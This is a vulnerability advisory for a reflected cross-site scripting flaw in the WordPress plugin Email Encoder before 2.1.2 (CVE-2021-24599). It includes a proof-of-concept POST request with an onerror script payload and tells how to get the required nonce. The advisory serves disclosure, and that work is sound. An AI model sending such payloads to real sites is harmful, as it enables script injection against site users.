WordPress Plugin Vulnerabilities

Email Encoder < 2.1.2 - Reflected Cross Site Scripting

Description

The plugin has an endpoint that requires no authentication and will render a user supplied value in the HTML response without escaping or sanitizing the data.

Proof of Concept

The vulnerable function is nonce protected, the nonce can be found in the site's HTML source by searching for the javascript variable "eeb_ef" 

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://127.0.0.1:8080
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:8080/
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1

action=eeb_get_email_form_output&eebsec=<your nonce here>&eebMethod=escape&eebDisplay=<img src=1 onerror=alert(1)>

Affects Plugins

Plugin icon
email-encoder-bundle
Fixed in 2.1.2

References

CVE
CVE-2021-24599

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
625a272f-5c69-4f6a-8eee-32f70cd4a558

Timeline

Publicly Published
2021-08-02 (about 2 years ago)
Added
2021-08-03 (about 2 years ago)
Last Updated
2022-02-24 (about 2 years ago)

Other

Published
Title
Published
2024-03-25
Title
Gratisfaction < 4.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2018-03-08
Title
Activity Log <= 2.4.0 - Multiple Cross-Site Scripting (XSS)
Published
2023-08-14
Title
Article Directory Redux <= 1.0.2 - Admin+ Stored XSS
Published
2023-04-19
Title
WP Responsive Tabs horizontal vertical and accordion Tabs < 1.1.16 - Reflected Cross-Site Scripting
Published
2023-10-16
Title
Abandoned Cart Lite for WooCommerce < 5.16.0 - Admin+ Stored XSS